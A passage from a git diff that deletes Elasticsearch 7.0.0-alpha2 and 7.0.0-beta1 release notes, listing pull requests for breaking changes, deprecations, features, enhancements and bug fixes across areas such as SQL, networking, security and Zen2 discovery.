datafeed start {es-pull}36233[#36233] -* Add lazy parsing for DatafeedConfig:Aggs,Query {es-pull}36117[#36117] -* Add support for lazy nodes (#29991) {es-pull}34538[#34538] (issue: {es-issue}29991[#29991]) - -Network:: -* Unify transport settings naming {es-pull}36623[#36623] -* Add sni name to SSLEngine in netty transport {es-pull}33144[#33144] (issue: {es-issue}32517[#32517]) -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) -* Add NioGroup for use in different transports {es-pull}27737[#27737] (issue: {es-issue}27260[#27260]) -* Add read timeouts to http module {es-pull}27713[#27713] -* Implement byte array reusage in `NioTransport` {es-pull}27696[#27696] (issue: {es-issue}27563[#27563]) -* Introduce resizable inbound byte buffer {es-pull}27551[#27551] (issue: {es-issue}27563[#27563]) -* Decouple nio constructs from the tcp transport {es-pull}27484[#27484] (issue: {es-issue}27260[#27260]) -* Remove manual tracking of registered channels {es-pull}27445[#27445] (issue: {es-issue}27260[#27260]) -* Remove tcp profile from low level nio channel {es-pull}27441[#27441] (issue: {es-issue}27260[#27260]) -* Decouple `ChannelFactory` from Tcp classes {es-pull}27286[#27286] (issue: {es-issue}27260[#27260]) - -Packaging:: -* Introduce Docker images build {es-pull}36246[#36246] -* Move creation of temporary directory to Java {es-pull}36002[#36002] (issue: {es-issue}31003[#31003]) - -Plugins:: -* Plugin install: don't print download progress in batch mode {es-pull}36361[#36361] - -Ranking:: -* Vector field {es-pull}33022[#33022] (issue: {es-issue}31615[#31615]) - -Recovery:: -* Exposed engine must include all operations below global checkpoint during rollback {es-pull}36159[#36159] (issue: {es-issue}32867[#32867]) - -Rollup:: -* Add non-X-Pack centric rollup endpoints {es-pull}36383[#36383] (issues: {es-issue}35958[#35958], {es-issue}35962[#35962]) -* Add more diagnostic stats to job {es-pull}35471[#35471] -* Add `wait_for_completion` option to StopRollupJob API {es-pull}34811[#34811] (issue: {es-issue}34574[#34574]) - -Scripting:: -* Update joda compat methods to use compat class {es-pull}36654[#36654] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] -* [Painless] Add def to boxed type casts {es-pull}36506[#36506] - -Settings:: -* Add user-defined cluster metadata {es-pull}33325[#33325] (issue: {es-issue}33220[#33220]) - -Search:: -* Add copy constructor to SearchRequest {es-pull}36641[#36641] (issue: {es-issue}32125[#32125]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) -* Add sort and collapse info to SearchHits transport serialization {es-pull}36555[#36555] (issue: {es-issue}32125[#32125]) -* Add default methods to DocValueFormat {es-pull}36480[#36480] 
-* Respect indices options on _msearch {es-pull}35887[#35887] -* Allow efficient can_match phases on frozen indices {es-pull}35431[#35431] (issues: {es-issue}34352[#34352], {es-issue}34357[#34357]) -* Add a new query type - ScriptScoreQuery {es-pull}34533[#34533] (issues: {es-issue}23850[#23850], {es-issue}27588[#27588], {es-issue}30303[#30303]) - -Security:: -* Make credentials mandatory when launching xpack/migrate {es-pull}36197[#36197] (issues: {es-issue}29847[#29847], {es-issue}33972[#33972]) - -Snapshot/Restore:: -* Allow Parallel Restore Operations {es-pull}36397[#36397] -* Repo Creation out of ClusterStateTask {es-pull}36157[#36157] (issue: {es-issue}9488[#9488]) -* Add read-only repository verification {es-pull}35731[#35731] (issue: {es-issue}35703[#35703]) - -SQL:: -* Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) -* Introduce NOW/CURRENT_TIMESTAMP function {es-pull}36562[#36562] (issue: {es-issue}36534[#36534]) -* Move requests' parameters to requests JSON body {es-pull}36149[#36149] (issue: {es-issue}35992[#35992]) -* Make INTERVAL millis optional {es-pull}36043[#36043] (issue: {es-issue}36032[#36032]) -* Implement data type verification for conditionals {es-pull}35916[#35916] (issue: {es-issue}35907[#35907]) -* Implement GREATEST and LEAST functions {es-pull}35879[#35879] (issue: {es-issue}35878[#35878]) -* Implement null safe equality operator `<=>` {es-pull}35873[#35873] (issue: {es-issue}35871[#35871]) -* SYS COLUMNS returns ODBC specific schema {es-pull}35870[#35870] (issue: {es-issue}35376[#35376]) -* Polish grammar for intervals {es-pull}35853[#35853] -* Add filtering to SYS TYPES {es-pull}35852[#35852] (issue: {es-issue}35342[#35342]) -* Implement NULLIF(expr1, expr2) function {es-pull}35826[#35826] (issue: {es-issue}35818[#35818]) -* Lock down JDBC driver {es-pull}35798[#35798] (issue: {es-issue}35437[#35437]) -* Implement NVL(expr1, expr2) {es-pull}35794[#35794] (issue: {es-issue}35782[#35782]) -* Implement ISNULL(expr1, expr2) {es-pull}35793[#35793] (issue: {es-issue}35781[#35781]) -* Implement IFNULL variant of COALESCE {es-pull}35762[#35762] (issue: {es-issue}35749[#35749]) -* XPack FeatureSet functionality {es-pull}35725[#35725] (issue: {es-issue}34821[#34821]) -* Perform lazy evaluation of mismatched mappings {es-pull}35676[#35676] (issues: {es-issue}35659[#35659], {es-issue}35675[#35675]) -* Improve validation of unsupported fields {es-pull}35675[#35675] (issue: {es-issue}35673[#35673]) -* Move internals from Joda to java.time {es-pull}35649[#35649] (issue: {es-issue}35633[#35633]) - -Stats:: -* Handle OS pretty name on old OS without OS release {es-pull}35453[#35453] (issue: {es-issue}35440[#35440]) - -Task Management:: -* Periodically try to reassign unassigned persistent tasks {es-pull}36069[#36069] (issue: {es-issue}35792[#35792]) -* Only require task permissions {es-pull}35667[#35667] (issue: {es-issue}35573[#35573]) -* Retry if task can't be written {es-pull}35054[#35054] (issue: {es-issue}33764[#33764]) - -ZenDiscovery:: -* Add discovery types to cluster stats {es-pull}36442[#36442] -* Introduce `zen2` discovery type {es-pull}36298[#36298] -* Zen2: Persist cluster states the old way on non-master-eligible nodes {es-pull}36247[#36247] (issue: {es-issue}3[#3]) -* [Zen2] Storage layer WriteStateException propagation {es-pull}36052[#36052] -* [Zen2] Implement Tombstone 
REST APIs {es-pull}36007[#36007] -* [Zen2] Update default for USE_ZEN2 to true {es-pull}35998[#35998] -* [Zen2] Add warning if cluster fails to form fast enough {es-pull}35993[#35993] -* [Zen2] Allow Setting a List of Bootstrap Nodes to Wait for {es-pull}35847[#35847] -* [Zen2] VotingTombstone class {es-pull}35832[#35832] -* [Zen2] PersistedState interface implementation {es-pull}35819[#35819] -* [Zen2] Support rolling upgrades from Zen1 {es-pull}35737[#35737] -* [Zen2] Add lag detector {es-pull}35685[#35685] -* [Zen2] Move ClusterState fields to be persisted to ClusterState.Metadata {es-pull}35625[#35625] -* [Zen2] Introduce ClusterBootstrapService {es-pull}35488[#35488] -* [Zen2] Introduce vote withdrawal {es-pull}35446[#35446] -* Zen2: Add basic Zen1 transport-level BWC {es-pull}35443[#35443] - -[[bug-7.0.0-alpha2]] -[discrete] -=== Bug fixes - -Aggregations:: -* fix MultiValuesSourceFieldConfig toXContent {es-pull}36525[#36525] (issue: {es-issue}36474[#36474]) -* Cache the score of the parent document in the nested agg {es-pull}36019[#36019] (issues: {es-issue}34555[#34555], {es-issue}35985[#35985]) -* Correct implemented interface of ParsedReverseNested {es-pull}35455[#35455] (issue: {es-issue}35449[#35449]) -* Handle IndexOrDocValuesQuery in composite aggregation {es-pull}35392[#35392] - -Audit:: -* Fix origin.type for connection_* events {es-pull}36410[#36410] -* Fix IndexAuditTrail rolling restart on rollover edge {es-pull}35988[#35988] (issue: {es-issue}33867[#33867]) - -Authentication:: -* Fix kerberos setting registration {es-pull}35986[#35986] (issues: {es-issue}30241[#30241], {es-issue}35942[#35942]) -* Add support for Kerberos V5 Oid {es-pull}35764[#35764] (issue: {es-issue}34763[#34763]) - -Build:: -* Use explicit deps on test tasks for check {es-pull}36325[#36325] -* Fix jdbc jar pom to not include deps {es-pull}36036[#36036] (issue: {es-issue}32014[#32014]) -* Fix official plugins list {es-pull}35661[#35661] (issue: {es-issue}35623[#35623]) - -CCR:: -* Fix follow stats API's follower index filtering feature {es-pull}36647[#36647] -* AutoFollowCoordinator should tolerate that auto follow patterns may be removed {es-pull}35945[#35945] (issue: {es-issue}35937[#35937]) -* Only auto follow indices when all primary shards have started {es-pull}35814[#35814] (issue: {es-issue}35480[#35480]) -* Avoid NPE in follower stats when no tasks metadata {es-pull}35802[#35802] -* Fix the names of CCR stats endpoints in usage API {es-pull}35438[#35438] - -Circuit Breakers:: -* Modify `BigArrays` to take name of circuit breaker {es-pull}36461[#36461] (issue: {es-issue}31435[#31435]) - -Core:: -* Fix CompositeBytesReference#slice to not throw AIOOBE with legal offsets. {es-pull}35955[#35955] (issue: {es-issue}35950[#35950]) -* Suppress CachedTimeThread in hot threads output {es-pull}35558[#35558] (issue: {es-issue}23175[#23175]) -* Upgrade to Joda 2.10.1 {es-pull}35410[#35410] (issue: {es-issue}33749[#33749]) - -Distributed:: -* Combine the execution of an exclusive replica operation with primary term update {es-pull}36116[#36116] (issue: {es-issue}35850[#35850]) -* ActiveShardCount should not fail when closing the index {es-pull}35936[#35936] - -Engine:: -* Set Lucene version upon index creation. 
{es-pull}36038[#36038] (issue: {es-issue}33826[#33826]) -* Wrap can_match reader with ElasticsearchDirectoryReader {es-pull}35857[#35857] -* Copy checkpoint atomically when rolling generation {es-pull}35407[#35407] - -Geo:: -* More robust handling of ignore_malformed in geoshape parsing {es-pull}35603[#35603] (issues: {es-issue}34047[#34047], {es-issue}34498[#34498]) -* Better handling of malformed geo_points {es-pull}35554[#35554] (issue: {es-issue}35419[#35419]) -* Enables coerce support in WKT polygon parser {es-pull}35414[#35414] (issue: {es-issue}35059[#35059]) - -Index APIs:: -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Raise a 404 exception when document source is not found (#33384) {es-pull}34083[#34083] (issue: {es-issue}33384[#33384]) - -Ingest:: -* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) -* Support default pipeline through an alias {es-pull}36231[#36231] (issue: {es-issue}35817[#35817]) - -License:: -* Do not serialize basic license exp in x-pack info {es-pull}30848[#30848] -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) - -Machine Learning:: -* Interrupt Grok in file structure finder timeout {es-pull}36588[#36588] -* Prevent stack overflow while copying ML jobs and datafeeds {es-pull}36370[#36370] (issue: {es-issue}36360[#36360]) -* Adjust file structure finder parser config {es-pull}35935[#35935] -* Fix find_file_structure NPE with should_trim_fields {es-pull}35465[#35465] (issue: {es-issue}35462[#35462]) -* Prevent notifications being created on deletion of a non existent job {es-pull}35337[#35337] (issues: {es-issue}34058[#34058], {es-issue}35336[#35336]) -* Clear Job#finished_time when it is opened (#32605) {es-pull}32755[#32755] -* Fix thread leak when waiting for job flush (#32196) {es-pull}32541[#32541] (issue: {es-issue}32196[#32196]) -* Fix CPoissonMeanConjugate sampling error. 
{ml-pull}335[#335] - -Network:: -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) -* Always compress based on the settings {es-pull}36522[#36522] (issue: {es-issue}36399[#36399]) -* http.publish_host Should Contain CNAME {es-pull}32806[#32806] (issue: {es-issue}22029[#22029]) -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Add TRACE, CONNECT, and PATCH http methods {es-pull}31035[#31035] (issue: {es-issue}31017[#31017]) -* Transport client: Don't validate node in handshake {es-pull}30737[#30737] (issue: {es-issue}30141[#30141]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] -* Remove potential nio selector leak {es-pull}27825[#27825] -* Fix issue where the incorrect buffers are written {es-pull}27695[#27695] (issue: {es-issue}27551[#27551]) -* Do not set SO_LINGER on server channels {es-pull}26997[#26997] -* Do not set SO_LINGER to 0 when not shutting down {es-pull}26871[#26871] (issue: {es-issue}26764[#26764]) -* Release pipelined http responses on close {es-pull}26226[#26226] - -Packaging:: -* Fix error message when package install fails due to missing Java {es-pull}36077[#36077] (issue: {es-issue}31845[#31845]) -* Add missing entries to conffiles {es-pull}35810[#35810] (issue: {es-issue}35691[#35691]) - -Plugins:: -* Ensure that azure stream has socket privileges {es-pull}28751[#28751] (issue: {es-issue}28662[#28662]) - -Recovery:: -* Register ResyncTask.Status as a NamedWriteable {es-pull}36610[#36610] - -Rollup:: -* Fix rollup search statistics {es-pull}36674[#36674] - -Scripting:: -* Properly support no-offset date formatting {es-pull}36316[#36316] (issue: {es-issue}36306[#36306]) -* [Painless] Generate Bridge Methods {es-pull}36097[#36097] -* Fix serialization bug in painless execute api request {es-pull}36075[#36075] (issue: {es-issue}36050[#36050]) -* Actually add joda time back to whitelist {es-pull}35965[#35965] (issue: {es-issue}35915[#35915]) -* Add back joda to whitelist {es-pull}35915[#35915] (issue: {es-issue}35913[#35913]) - -Settings:: -* Correctly Identify Noop Updates {es-pull}36560[#36560] (issue: {es-issue}36496[#36496]) - -SQL:: -* Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* Fix translation to painless for conditionals {es-pull}36636[#36636] (issue: {es-issue}36631[#36631]) -* Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* Fix MOD() for long and integer arguments {es-pull}36599[#36599] (issue: {es-issue}36364[#36364]) -* Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) -* Be lenient for tests involving comparison to H2 but strict for csv spec tests {es-pull}36498[#36498] (issue: {es-issue}36483[#36483]) -* Non ISO 8601 versions of DAY_OF_WEEK and WEEK_OF_YEAR functions {es-pull}36358[#36358] (issue: {es-issue}36263[#36263]) -* Do not ignore all fields whose names start with underscore {es-pull}36214[#36214] (issue: {es-issue}36206[#36206]) -* Fix issue with wrong data type for scripted Grouping keys {es-pull}35969[#35969] (issue: {es-issue}35662[#35662]) -* Fix translation of math functions to painless {es-pull}35910[#35910] (issue: {es-issue}35654[#35654]) -* Fix jdbc jar to include deps 
{es-pull}35602[#35602] -* Fix query translation for scripted queries {es-pull}35408[#35408] (issue: {es-issue}35232[#35232]) -* Clear the cursor if nested inner hits are enough to fulfill the query required limits {es-pull}35398[#35398] (issue: {es-issue}35176[#35176]) -* Introduce IsNull node to simplify expressions {es-pull}35206[#35206] (issues: {es-issue}34876[#34876], {es-issue}35171[#35171]) -* The SSL default configuration shouldn't override the https protocol if used {es-pull}34635[#34635] (issue: {es-issue}33817[#33817]) -* Minor fix for javadoc {es-pull}32573[#32573] (issue: {es-issue}32553[#32553]) - -Search:: -* Inner hits fail to propagate doc-value format. {es-pull}36310[#36310] -* Fix custom AUTO issue with Fuzziness#toXContent {es-pull}35807[#35807] (issue: {es-issue}33462[#33462]) -* Fix analyzed prefix query in query_string {es-pull}35756[#35756] (issue: {es-issue}31702[#31702]) -* Fix problem with MatchNoDocsQuery in disjunction queries {es-pull}35726[#35726] (issue: {es-issue}34708[#34708]) -* Fix phrase_slop in query_string query {es-pull}35533[#35533] (issue: {es-issue}35125[#35125]) -* Add a More Like This query routing requirement check (#29678) {es-pull}33974[#33974] - -Security:: -* Remove license state listeners on closeables {es-pull}36308[#36308] (issues: {es-issue}33328[#33328], {es-issue}35627[#35627], {es-issue}35628[#35628]) - -Snapshot/Restore:: -* Upgrade GCS Dependencies to 1.55.0 {es-pull}36634[#36634] (issues: {es-issue}35229[#35229], {es-issue}35459[#35459]) -* Improve Resilience SnapshotShardService {es-pull}36113[#36113] (issue: {es-issue}32265[#32265]) -* Keep SnapshotsInProgress State in Sync with Routing Table {es-pull}35710[#35710] -* Ensure that gcs client creation is privileged {es-pull}25938[#25938] (issue: {es-issue}25932[#25932]) -* Make calls to CloudBlobContainer#exists privileged {es-pull}25937[#25937] (issue: {es-issue}25931[#25931]) - -Watcher:: -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Only trigger a watch if new or schedule/changed {es-pull}35908[#35908] -* Fix Watcher NotificationService's secure settings {es-pull}35610[#35610] (issue: {es-issue}35378[#35378]) -* Fix integration tests to ensure correct start/stop of Watcher {es-pull}35271[#35271] (issues: {es-issue}29877[#29877], {es-issue}30705[#30705], {es-issue}33291[#33291], {es-issue}34448[#34448], {es-issue}34462[#34462]) - -ZenDiscovery:: -* [Zen2] Respect the no_master_block setting {es-pull}36478[#36478] -* Cancel GetDiscoveredNodesAction when bootstrapped {es-pull}36423[#36423] (issues: {es-issue}36380[#36380], {es-issue}36381[#36381]) -* [Zen2] Only elect master-eligible nodes {es-pull}35996[#35996] -* [Zen2] Remove duplicate discovered peers {es-pull}35505[#35505] - - -[[regression-7.0.0-alpha2]] -[discrete] -=== Regressions - -Scripting:: -* Use Number as a return value for BucketAggregationScript {es-pull}35653[#35653] (issue: {es-issue}35351[#35351]) - - -[[upgrade-7.0.0-alpha2]] -[discrete] -=== Upgrades - -Ingest:: -* Update geolite2 database in ingest geoip plugin {es-pull}33840[#33840] - -Network:: -* Upgrade Netty 4.3.32.Final {es-pull}36102[#36102] (issue: {es-issue}35360[#35360]) diff --git a/docs/reference/release-notes/7.0.0-beta1.asciidoc b/docs/reference/release-notes/7.0.0-beta1.asciidoc deleted file mode 100644 index 4a2f3f0c14a..00000000000 --- a/docs/reference/release-notes/7.0.0-beta1.asciidoc +++ /dev/null @@ -1,689 +0,0 @@ -[[release-notes-7.0.0-beta1]] -== {es} version 7.0.0-beta1 - -Also see <>. 
- -[[breaking-7.0.0-beta1]] -[discrete] -=== Breaking changes - -Audit:: -* Remove index audit output type {es-pull}37707[#37707] (issues: {es-issue}29881[#29881], {es-issue}37301[#37301]) - -Authentication:: -* Remove bwc logic for token invalidation {es-pull}36893[#36893] (issue: {es-issue}36727[#36727]) - -Authorization:: -* Remove implicit index monitor privilege {es-pull}37774[#37774] - -CCR:: -* Follow stats api should return a 404 when requesting stats for a non existing index {es-pull}37220[#37220] (issue: {es-issue}37021[#37021]) - -CRUD:: -* Remove support for internal versioning for concurrency control {es-pull}38254[#38254] (issue: {es-issue}1078[#1078]) - -Features/Ingest:: -* Add ECS schema for user-agent ingest processor (#37727) {es-pull}37984[#37984] (issues: {es-issue}37329[#37329], {es-issue}37727[#37727]) -* Remove special handling for ingest plugins {es-pull}36967[#36967] (issues: {es-issue}36898[#36898], {es-issue}36956[#36956]) - -Features/Java Low Level REST Client:: -* Drop support for the low-level REST client on JDK 7 {es-pull}38540[#38540] (issue: {es-issue}29607[#29607]) - -Features/Watcher:: -* Remove Watcher Account "unsecure" settings {es-pull}36736[#36736] (issue: {es-issue}36403[#36403]) - -Infra/Logging:: -* Elasticsearch json logging {es-pull}36833[#36833] (issue: {es-issue}32850[#32850]) - -Infra/Packaging:: -* Package ingest-user-agent as a module {es-pull}36956[#36956] -* Package ingest-geoip as a module {es-pull}36898[#36898] - -Machine Learning:: -* [ML] Remove types from datafeed {es-pull}36538[#36538] (issue: {es-issue}34265[#34265]) - -Mapping:: -* Make sure to reject mappings with type _doc when include_type_name is false. {es-pull}38270[#38270] (issue: {es-issue}38266[#38266]) -* Update the default for include_type_name to false. {es-pull}37285[#37285] -* Support 'include_type_name' in RestGetIndicesAction {es-pull}37149[#37149] - -Network:: -* Remove TLS 1.0 as a default SSL protocol {es-pull}37512[#37512] (issue: {es-issue}36021[#36021]) -* Security: remove SSL settings fallback {es-pull}36846[#36846] (issue: {es-issue}29797[#29797]) - -Ranking:: -* Forbid negative field boosts in analyzed queries {es-pull}37930[#37930] (issue: {es-issue}33309[#33309]) - -Search:: -* Track total hits up to 10,000 by default {es-pull}37466[#37466] (issue: {es-issue}33028[#33028]) -* Use mappings to format doc-value fields by default. 
{es-pull}30831[#30831] (issues: {es-issue}26948[#26948], {es-issue}29639[#29639]) - -Security:: -* Remove heuristics that enable security on trial licenses {es-pull}38075[#38075] (issue: {es-issue}38009[#38009]) - -ZenDiscovery:: -* Remove DiscoveryPlugin#getDiscoveryTypes {es-pull}38414[#38414] (issue: {es-issue}38410[#38410]) - - - -[[breaking-java-7.0.0-beta1]] -[discrete] -=== Breaking Java changes - -Features/Java Low Level REST Client:: -* Remove support for maxRetryTimeout from low-level REST client {es-pull}38085[#38085] (issues: {es-issue}25951[#25951], {es-issue}31834[#31834], {es-issue}33342[#33342]) - -Infra/Core:: -* Handle scheduler exceptions {es-pull}38014[#38014] (issues: {es-issue}28667[#28667], {es-issue}36137[#36137], {es-issue}37708[#37708]) - - - -[[deprecation-7.0.0-beta1]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate dots in aggregation names {es-pull}31468[#31468] (issues: {es-issue}17600[#17600], {es-issue}19040[#19040]) - -Analysis:: -* [Analysis] Deprecate Standard Html Strip Analyzer in master {es-pull}26719[#26719] (issue: {es-issue}4704[#4704]) - -Audit:: -* Deprecate index audit output type {es-pull}37301[#37301] (issue: {es-issue}29881[#29881]) - -Features/Indices APIs:: -* Reject setting index.optimize_auto_generated_id after version 7.0.0 {es-pull}28895[#28895] (issue: {es-issue}27600[#27600]) - -Features/Ingest:: -* Deprecate `_type` in simulate pipeline requests {es-pull}37949[#37949] (issue: {es-issue}37731[#37731]) - -Features/Java High Level REST Client:: -* Deprecate HLRC security methods {es-pull}37883[#37883] (issues: {es-issue}36938[#36938], {es-issue}37540[#37540]) -* Deprecate HLRC EmptyResponse used by security {es-pull}37540[#37540] (issue: {es-issue}36938[#36938]) - -Features/Watcher:: -* Deprecate xpack.watcher.history.cleaner_service.enabled {es-pull}37782[#37782] (issue: {es-issue}32041[#32041]) -* deprecate types for watcher {es-pull}37594[#37594] (issue: {es-issue}35190[#35190]) - -Infra/Core:: -* Core: Deprecate negative epoch timestamps {es-pull}36793[#36793] -* Core: Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] - -Infra/Scripting:: -* Add types deprecation to script contexts {es-pull}37554[#37554] -* Deprecate _type from LeafDocLookup {es-pull}37491[#37491] -* Scripting: Remove deprecated params.ctx {es-pull}36848[#36848] (issue: {es-issue}34059[#34059]) - -Machine Learning:: -* Adding ml_settings entry to HLRC and Docs for deprecation_info {es-pull}38118[#38118] -* [ML] Datafeed deprecation checks {es-pull}38026[#38026] (issue: {es-issue}37932[#37932]) -* [ML] Remove "8" prefixes from file structure finder timestamp formats {es-pull}38016[#38016] -* [ML] Adjust structure finder for Joda to Java time migration {es-pull}37306[#37306] -* [ML] Resolve 7.0.0 TODOs in ML code {es-pull}36842[#36842] (issue: {es-issue}29963[#29963]) - -Mapping:: -* Deprecate types in rollover index API {es-pull}38039[#38039] (issue: {es-issue}35190[#35190]) -* Deprecate types in get field mapping API {es-pull}37667[#37667] (issue: {es-issue}35190[#35190]) -* Deprecate types in the put mapping API. {es-pull}37280[#37280] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Support include_type_name in the field mapping and index template APIs. {es-pull}37210[#37210] -* Deprecate types in create index requests. {es-pull}37134[#37134] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Deprecate use of the _type field in aggregations. 
{es-pull}37131[#37131] (issue: {es-issue}36802[#36802]) -* Deprecate reference to _type in lookup queries {es-pull}37016[#37016] (issue: {es-issue}35190[#35190]) -* Deprecate the document create endpoint. {es-pull}36863[#36863] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate types in update APIs {es-pull}36225[#36225] - -Search:: -* Deprecate use of type in reindex request body {es-pull}36823[#36823] -* Add typeless endpoints for get_source and exist_source {es-pull}36426[#36426] - - - -[[feature-7.0.0-beta1]] -[discrete] -=== New features - -Authentication:: -* Add support for API keys to access Elasticsearch {es-pull}38291[#38291] (issue: {es-issue}34383[#34383]) -* OIDC realm authentication flows {es-pull}37787[#37787] -* [WIP] OIDC Realm JWT+JWS related functionality {es-pull}37272[#37272] (issues: {es-issue}35339[#35339], {es-issue}37009[#37009]) -* OpenID Connect Realm base functionality {es-pull}37009[#37009] (issue: {es-issue}35339[#35339]) - -Authorization:: -* Allow custom authorization with an authorization engine {es-pull}38358[#38358] (issues: {es-issue}32435[#32435], {es-issue}36245[#36245], {es-issue}37328[#37328], {es-issue}37495[#37495], {es-issue}37785[#37785], {es-issue}38137[#38137], {es-issue}38219[#38219]) -* Wildcard IndicesPermissions don't cover .security {es-pull}36765[#36765] - -CCR:: -* Add ccr follow info api {es-pull}37408[#37408] (issue: {es-issue}37127[#37127]) - -Features/ILM:: -* [ILM] Add unfollow action {es-pull}36970[#36970] (issue: {es-issue}34648[#34648]) - -Geo:: -* geotile_grid implementation {es-pull}37842[#37842] (issue: {es-issue}30240[#30240]) -* [GEO] Fork Lucene's LatLonShape Classes to local lucene package {es-pull}36794[#36794] -* [Geo] Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* [Geo] Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Machine Learning:: -* ML: Adds set_upgrade_mode API endpoint {es-pull}37837[#37837] - -Mapping:: -* Give precedence to index creation when mixing typed templates with typeless index creation and vice-versa. {es-pull}37871[#37871] (issue: {es-issue}37773[#37773]) -* Add nanosecond field mapper {es-pull}37755[#37755] (issues: {es-issue}27330[#27330], {es-issue}32601[#32601]) - -SQL:: -* SQL: Allow sorting of groups by aggregates {es-pull}38042[#38042] (issue: {es-issue}35118[#35118]) -* SQL: Implement FIRST/LAST aggregate functions {es-pull}37936[#37936] (issue: {es-issue}35639[#35639]) -* SQL: Introduce SQL DATE data type {es-pull}37693[#37693] (issue: {es-issue}37340[#37340]) - -Search:: -* Introduce ability to minimize round-trips in CCS {es-pull}37828[#37828] (issues: {es-issue}32125[#32125], {es-issue}37566[#37566]) -* Add script filter to intervals {es-pull}36776[#36776] -* Add the ability to set the number of hits to track accurately {es-pull}36357[#36357] (issue: {es-issue}33028[#33028]) -* Add a maximum search request size. 
{es-pull}26423[#26423] - - - -[[enhancement-7.0.0-beta1]] -[discrete] -=== Enhancements - -Aggregations:: -* Add Composite to AggregationBuilders {es-pull}38207[#38207] (issue: {es-issue}38020[#38020]) -* Allow nested fields in the composite aggregation {es-pull}37178[#37178] (issue: {es-issue}28611[#28611]) -* Remove single shard optimization when suggesting shard_size {es-pull}37041[#37041] (issue: {es-issue}32125[#32125]) -* Use List instead of priority queue for stable sorting in bucket sort aggregator {es-pull}36748[#36748] (issue: {es-issue}36322[#36322]) -* Keys are compared in BucketSortPipelineAggregation so making key type… {es-pull}36407[#36407] - -Allocation:: -* Fail start on obsolete indices documentation {es-pull}37786[#37786] (issue: {es-issue}27073[#27073]) -* Fail start on invalid index metadata {es-pull}37748[#37748] (issue: {es-issue}27073[#27073]) -* Fail start of non-data node if node has data {es-pull}37347[#37347] (issue: {es-issue}27073[#27073]) - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) - -Audit:: -* Security Audit includes HTTP method for requests {es-pull}37322[#37322] (issue: {es-issue}29765[#29765]) -* Add X-Forwarded-For to the logfile audit {es-pull}36427[#36427] - -Authentication:: -* Security: propagate auth result to listeners {es-pull}36900[#36900] (issue: {es-issue}30794[#30794]) -* Security: reorder realms based on last success {es-pull}36878[#36878] -* Improve error message for 6.x style realm settings {es-pull}36876[#36876] (issues: {es-issue}30241[#30241], {es-issue}36026[#36026]) -* Change missing authn message to not mention tokens {es-pull}36750[#36750] -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Enhance Invalidate Token API {es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Authorization:: -* Add apm_user reserved role {es-pull}38206[#38206] -* Permission for restricted indices {es-pull}37577[#37577] (issue: {es-issue}34454[#34454]) -* Remove kibana_user and kibana_dashboard_only_user index privileges {es-pull}37441[#37441] -* Create snapshot role {es-pull}35820[#35820] (issue: {es-issue}34454[#34454]) - -CCR:: -* Concurrent file chunk fetching for CCR restore {es-pull}38495[#38495] -* Tighten mapping syncing in ccr remote restore {es-pull}38071[#38071] (issues: {es-issue}36879[#36879], {es-issue}37887[#37887]) -* Do not allow put mapping on follower {es-pull}37675[#37675] (issue: {es-issue}30086[#30086]) -* Added ccr to xpack usage infrastructure {es-pull}37256[#37256] (issue: {es-issue}37221[#37221]) -* [CCR] FollowingEngine should fail with 403 if operation has no seqno assigned {es-pull}37213[#37213] -* [CCR] Added auto_follow_exception.timestamp field to auto follow stats {es-pull}36947[#36947] -* [CCR] Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) - -CRUD:: -* Add Seq# 